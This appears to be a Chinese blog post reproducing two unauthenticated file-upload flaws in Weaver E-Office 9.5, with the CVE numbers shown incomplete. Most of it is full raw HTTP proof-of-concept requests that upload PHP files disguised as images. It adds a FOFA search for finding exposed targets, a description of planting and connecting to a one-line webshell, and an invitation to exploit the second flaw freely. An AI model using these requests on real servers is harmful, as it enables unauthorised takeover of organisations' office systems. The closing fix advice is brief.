700字范文,内容丰富有趣,生活中的好帮手!
700字范文 > 泛微 E-Office文件上传漏洞复现(CVE--2523 CVE--2648)

泛微 E-Office文件上传漏洞复现(CVE--2523 CVE--2648)

时间:2020-07-26 17:56:13

相关推荐

泛微 E-Office文件上传漏洞复现(CVE--2523 CVE--2648)

0x01 产品简介

泛微E-Office是一款标准化的协同 OA 办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。

0x02 漏洞概述

cve--2523

泛微e-office 9.5版本,源文件 App/Ajax/ajax.php?action=mobile_upload_save 的一些未知功能存在问题。 参数 upload_quwan 的操作导致不受限制的上传,未经身份验证的恶意攻击者通过上传恶意文件,从而获取目标服务器的控制权限。

cve--2648

由于泛微e-office 9.5版本源文件/inc/jquery/uploadify/uploadify.php存在问题,对参数Filedata的操作会导致不受限制的上传,未经身份验证的恶意攻击者通过上传恶意文件,从而获取目标服务器的控制权限。

0x03 影响范围

泛微 E-Office 9.5

0x04 复现环境

FOFA:app="泛微-EOffice"

0x05漏洞复现

cve--2523——PoC

POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1Host: your-ipContent-Length: 352Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: nullContent-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6ttUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7Connection: close------WebKitFormBoundarydRVCGWq4Cx3Sq6ttContent-Disposition: form-data; name="upload_quwan"; filename="1.php."Content-Type: image/jpeg<?php phpinfo();?>------WebKitFormBoundarydRVCGWq4Cx3Sq6ttContent-Disposition: form-data; name="file"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--

bp构造请求包复现

可以看到,回显了完整的上传路径,尝试访问

漏洞利用:上传一句话马子

尝试连接

注:必须要使用base64编码,不然会报错

cve--2648——PoC

POST /inc/jquery/uploadify/uploadify.php HTTP/1.1Host: your-ipContent-Length: 204Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: nullContent-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6ttUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7Connection: close------WebKitFormBoundarydRVCGWq4Cx3Sq6ttContent-Disposition: form-data; name="Fdiledata"; filename="uploadify.php."Content-Type: image/jpeg<?php phpinfo();?>------WebKitFormBoundarydRVCGWq4Cx3Sq6tt

上图所示:与cve--2523的不同点就是,他返回的只有一个随机的文件夹参数,并非完整路径,利用方式都一样,就不展示,各位随意发挥。

0x06 修复建议

目前官方已修复以上漏洞,受影响用户可以升级更新到安全版本。

官方下载链接:https://service.e-/download

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。